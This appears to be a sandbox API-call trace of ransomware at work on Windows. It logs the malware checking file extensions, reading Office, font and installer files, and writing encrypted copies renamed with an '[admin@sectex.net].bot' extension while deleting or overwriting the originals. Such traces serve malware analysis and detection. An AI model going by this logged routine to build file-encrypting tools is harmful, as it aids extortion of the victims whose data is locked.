	[0059.082] lstrlenW (lpString=".dbf") returned 4
	[0059.082] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
	[0059.082] lstrlenW (lpString=".1cd") returned 4
	[0059.082] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
	[0059.082] lstrlenW (lpString=".jpg") returned 4
	[0059.082] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
	[0059.082] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
	[0059.082] lstrlenW (lpString=".doc") returned 4
	[0059.082] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.082] lstrlenW (lpString=".docx") returned 5
	[0059.082] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.083] lstrlenW (lpString=".pdf") returned 4
	[0059.083] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.083] lstrlenW (lpString=".xls") returned 4
	[0059.083] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.083] lstrlenW (lpString=".xlsx") returned 5
	[0059.083] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.083] lstrlenW (lpString=".ppt") returned 4
	[0059.083] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
	[0059.083] lstrlenW (lpString=".zip") returned 4
	[0059.083] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.083] lstrlenW (lpString=".rar") returned 4
	[0059.083] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.083] lstrlenW (lpString=".bz2") returned 4
	[0059.083] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.083] lstrlenW (lpString=".7z") returned 3
	[0059.083] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
	[0059.083] lstrlenW (lpString=".dbf") returned 4
	[0059.083] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
	[0059.083] lstrlenW (lpString=".1cd") returned 4
	[0059.083] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63
	[0059.083] lstrlenW (lpString=".jpg") returned 4
	[0059.083] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.083] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.083] lstrlenW (lpString="AN03500_.WMF") returned 12
	[0059.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0059.084] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=9240) returned 1
	[0059.084] CloseHandle (hObject=0x230) returned 1
	[0059.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf")) returned 0x20
	[0059.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0059.086] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.086] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154
	[0059.341] GetLastError () returned 0x0
	[0059.341] ReadFile (in: hFile=0x230, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x2418, lpOverlapped=0x0) returned 1
	[0059.372] WriteFile (in: hFile=0x154, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x2420, lpOverlapped=0x0) returned 1
	[0059.380] ReadFile (in: hFile=0x230, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.380] WriteFile (in: hFile=0x154, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.380] SetEndOfFile (hFile=0x154) returned 1
	[0059.380] CloseHandle (hObject=0x154) returned 1
	[0059.380] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.380] SetEndOfFile (hFile=0x230) returned 1
	[0059.381] CloseHandle (hObject=0x230) returned 1
	[0059.381] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.381] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf")) returned 1
	[0059.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.382] lstrlenW (lpString=".doc") returned 4
	[0059.382] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.382] lstrlenW (lpString=".docx") returned 5
	[0059.382] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.382] lstrlenW (lpString=".pdf") returned 4
	[0059.382] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.382] lstrlenW (lpString=".xls") returned 4
	[0059.382] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.382] lstrlenW (lpString=".xlsx") returned 5
	[0059.382] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.382] lstrlenW (lpString=".ppt") returned 4
	[0059.382] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.382] lstrlenW (lpString=".zip") returned 4
	[0059.382] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.382] lstrlenW (lpString=".rar") returned 4
	[0059.382] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.382] lstrlenW (lpString=".bz2") returned 4
	[0059.382] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.382] lstrlenW (lpString=".7z") returned 3
	[0059.382] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.382] lstrlenW (lpString=".dbf") returned 4
	[0059.382] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.382] lstrlenW (lpString=".1cd") returned 4
	[0059.382] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.382] lstrlenW (lpString=".jpg") returned 4
	[0059.382] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.383] lstrlenW (lpString=".doc") returned 4
	[0059.383] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.383] lstrlenW (lpString=".docx") returned 5
	[0059.383] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.383] lstrlenW (lpString=".pdf") returned 4
	[0059.383] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.383] lstrlenW (lpString=".xls") returned 4
	[0059.383] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.383] lstrlenW (lpString=".xlsx") returned 5
	[0059.383] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.383] lstrlenW (lpString=".ppt") returned 4
	[0059.383] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.383] lstrlenW (lpString=".zip") returned 4
	[0059.383] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.383] lstrlenW (lpString=".rar") returned 4
	[0059.383] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.383] lstrlenW (lpString=".bz2") returned 4
	[0059.383] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.383] lstrlenW (lpString=".7z") returned 3
	[0059.383] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.383] lstrlenW (lpString=".dbf") returned 4
	[0059.383] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.383] lstrlenW (lpString=".1cd") returned 4
	[0059.383] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63
	[0059.383] lstrlenW (lpString=".jpg") returned 4
	[0059.383] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.384] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.384] lstrlenW (lpString="AN04332_.WMF") returned 12
	[0059.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 

Thread:
	id = 15
	os_tid = 0x990

	[0032.819] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xabf08a8
	[0032.820] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xac008b0
	[0032.820] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f58
	[0032.820] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x6) returned 0xabb02c0
	[0032.820] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f70
	[0032.820] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x100000) returned 0xb0b0020
	[0032.820] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f88
	[0032.820] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08f88, Size=0x20) returned 0x7df2f90
	[0032.820] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f88
	[0032.820] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08f88, Size=0x20) returned 0x7df2f68
	[0032.821] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0032.821] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0032.821] Wow64DisableWow64FsRedirection (in: OldValue=0xa55ff58 | out: OldValue=0xa55ff58*=0x0) returned 1
	[0032.821] lstrlenW (lpString="kernel32.dll") returned 12
	[0032.821] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f90 | out: hHeap=0x7d60000) returned 1
	[0032.821] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0032.821] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f68 | out: hHeap=0x7d60000) returned 1
	[0032.821] Sleep (dwMilliseconds=0x64) 
	[0033.038] lstrcmpiW (lpString1=".ttf", lpString2=".bot") returned 1
	[0033.038] lstrlenW (lpString="jpn_boot.ttf") returned 12
	[0033.038] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.347] GetFileSizeEx (in: hFile=0x180, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=1984228) returned 1
	[0033.347] CloseHandle (hObject=0x180) returned 1
	[0033.347] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20
	[0033.347] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.347] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0033.347] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.347] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.347] lstrlenW (lpString=".doc") returned 4
	[0033.347] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0033.347] lstrlenW (lpString=".docx") returned 5
	[0033.347] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0033.347] lstrlenW (lpString=".pdf") returned 4
	[0033.347] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0033.347] lstrlenW (lpString=".xls") returned 4
	[0033.347] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0033.347] lstrlenW (lpString=".xlsx") returned 5
	[0033.347] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0033.347] lstrlenW (lpString=".ppt") returned 4
	[0033.347] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0033.347] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.347] lstrlenW (lpString=".zip") returned 4
	[0033.347] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0033.347] lstrlenW (lpString=".rar") returned 4
	[0033.347] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0033.347] lstrlenW (lpString=".bz2") returned 4
	[0033.347] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0033.348] lstrlenW (lpString=".7z") returned 3
	[0033.348] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0033.348] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.348] lstrlenW (lpString=".dbf") returned 4
	[0033.348] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0033.348] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.348] lstrlenW (lpString=".1cd") returned 4
	[0033.348] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0033.348] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.348] lstrlenW (lpString=".jpg") returned 4
	[0033.348] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0033.348] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.348] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.348] lstrlenW (lpString=".doc") returned 4
	[0033.348] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0033.348] lstrlenW (lpString=".docx") returned 5
	[0033.348] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0033.348] lstrlenW (lpString=".pdf") returned 4
	[0033.348] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0033.348] lstrlenW (lpString=".xls") returned 4
	[0033.348] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0033.348] lstrlenW (lpString=".xlsx") returned 5
	[0033.348] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0033.348] lstrlenW (lpString=".ppt") returned 4
	[0033.348] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0033.348] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.348] lstrlenW (lpString=".zip") returned 4
	[0033.348] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0033.348] lstrlenW (lpString=".rar") returned 4
	[0033.348] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0033.348] lstrlenW (lpString=".bz2") returned 4
	[0033.348] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0033.348] lstrlenW (lpString=".7z") returned 3
	[0033.348] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0033.349] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.349] lstrlenW (lpString=".dbf") returned 4
	[0033.349] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0033.349] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.349] lstrlenW (lpString=".1cd") returned 4
	[0033.349] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0033.349] lstrlenW (lpString="C:\\Boot\\Fonts\\jpn_boot.ttf") returned 26
	[0033.349] lstrlenW (lpString=".jpg") returned 4
	[0033.349] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0033.349] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0033.349] lstrlenW (lpString="ExcelMUI.msi") returned 12
	[0033.349] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0033.447] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=2506240) returned 1
	[0033.447] CloseHandle (hObject=0x184) returned 1
	[0033.447] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi")) returned 0x2020
	[0033.448] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.448] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0033.448] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0033.448] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0033.448] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0033.448] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0033.461] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0033.461] ReadFile (in: hFile=0x184, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0033.473] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0033.473] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0033.474] ReadFile (in: hFile=0x184, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0033.741] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.741] WriteFile (in: hFile=0x184, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0033.758] SetEndOfFile (hFile=0x184) returned 1
	[0035.128] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4eb740
	[0035.183] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0035.183] WriteFile (in: hFile=0x184, lpBuffer=0xb4eb740*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4eb740*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0035.185] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0035.185] WriteFile (in: hFile=0x184, lpBuffer=0xb4eb740*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4eb740*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0035.191] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0035.191] WriteFile (in: hFile=0x184, lpBuffer=0xb4eb740*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4eb740*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0035.194] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4eb740 | out: hHeap=0x7d60000) returned 1
	[0035.194] CloseHandle (hObject=0x184) returned 1
	[0035.812] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.813] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.813] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75
	[0035.813] lstrlenW (lpString=".doc") returned 4
	[0035.813] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0035.813] lstrlenW (lpString=".docx") returned 5
	[0035.813] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0035.813] lstrlenW (lpString=".pdf") returned 4
	[0035.813] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0035.813] lstrlenW (lpString=".xls") returned 4
	[0035.813] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0035.813] lstrlenW (lpString=".xlsx") returned 5
	[0035.813] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0035.813] lstrlenW (lpString=".ppt") returned 4
